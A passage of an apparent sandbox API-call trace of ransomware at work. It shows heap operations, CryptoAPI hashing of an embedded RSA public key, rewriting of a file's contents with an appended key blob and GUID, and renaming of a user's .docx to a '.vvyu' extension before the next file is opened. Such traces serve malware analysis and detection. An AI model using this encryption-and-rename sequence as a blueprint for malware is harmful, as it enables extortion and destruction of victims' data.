RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ae0 [0194.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ac8 [0194.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ab0 | out: hHeap=0x620000) returned 1 [0194.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0194.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0194.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0194.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0194.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657210 [0194.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea3a68 [0194.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0194.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0194.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ae0 | out: hHeap=0x620000) returned 1 [0194.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea3c78 [0194.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0194.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0194.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0194.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea3e90 [0194.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0194.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0194.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0194.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0194.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3c78 | out: hHeap=0x620000) returned 1 [0194.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e90 | out: hHeap=0x620000) returned 1 [0194.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a98 | out: hHeap=0x620000) returned 1 [0194.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0194.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a80 | out: hHeap=0x620000) returned 1 [0194.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0194.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0194.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0d08 | out: hHeap=0x620000) returned 1 [0194.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0194.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac90 | out: hHeap=0x620000) returned 1 [0194.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0194.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.048] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xbb1e, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xbb1e, lpOverlapped=0x0) returned 1 [0194.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0194.049] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xbb23, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.050] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0194.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0194.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.051] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0194.051] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.051] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.052] CloseHandle (hObject=0x568) returned 1 [0194.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0194.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea3a68 [0194.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0194.054] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\pY_fFtiab_Q4NWHp.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\py_fftiab_q4nwhp.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\pY_fFtiab_Q4NWHp.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\py_fftiab_q4nwhp.docx.vvyu")) returned 1 [0194.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.055] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0194.058] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78f72e20, ftCreationTime.dwHighDateTime=0x1d83f23, ftLastAccessTime.dwLowDateTime=0x9b898f80, ftLastAccessTime.dwHighDateTime=0x1d84afb, ftLastWriteTime.dwLowDateTime=0x9b898f80, ftLastWriteTime.dwHighDateTime=0x1d84afb, nFileSizeHigh=0x0, nFileSizeLow=0x17b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QtNn2GZ.xlsx", cAlternateFileName="QTNN2G~1.XLS")) returned 1 [0194.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0d08 [0194.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0d08 | out: hHeap=0x620000) returned 1 [0194.058] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\QtNn2GZ.xlsx") returned=".xlsx" [0194.058] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QtNn2GZ.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\qtnn2gz.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0194.060] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=6068) returned 1 [0194.060] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.063] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x178e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.063] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.075] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.075] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x17b4, lpOverlapped=0x0) returned 1 [0194.075] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.075] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.075] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.075] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.077] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.077] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.077] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.077] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.077] GetLastError () returned 0x0 [0194.077] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.077] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.077] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.077] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.077] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x17b0) returned 0x2ea3a68 [0194.078] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0194.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0194.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0194.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0d08 [0194.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6573d8 [0194.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0d50 [0194.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572d0 [0194.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657210 [0194.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0194.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2a80 [0194.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0194.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0194.078] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0194.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea5220 [0194.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0194.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a80 | out: hHeap=0x620000) returned 1 [0194.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0194.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0194.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea5220 | out: hHeap=0x620000) returned 1 [0194.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0194.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0194.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657210 [0194.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0194.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2a80 [0194.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0194.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0194.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0194.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0194.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0194.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0194.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0194.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a80 | out: hHeap=0x620000) returned 1 [0194.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0194.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0194.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0194.081] GetCurrentThreadId () returned 0x66c [0194.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0194.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9fa40 [0194.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0194.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0194.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0194.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0194.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.082] GetCurrentThreadId () returned 0x66c [0194.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0194.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0194.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0194.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac90 [0194.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0194.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0194.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0194.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0194.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0194.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657210 [0194.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0194.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0194.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0194.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0194.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2a80 [0194.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0194.084] RtlAllocateHeap 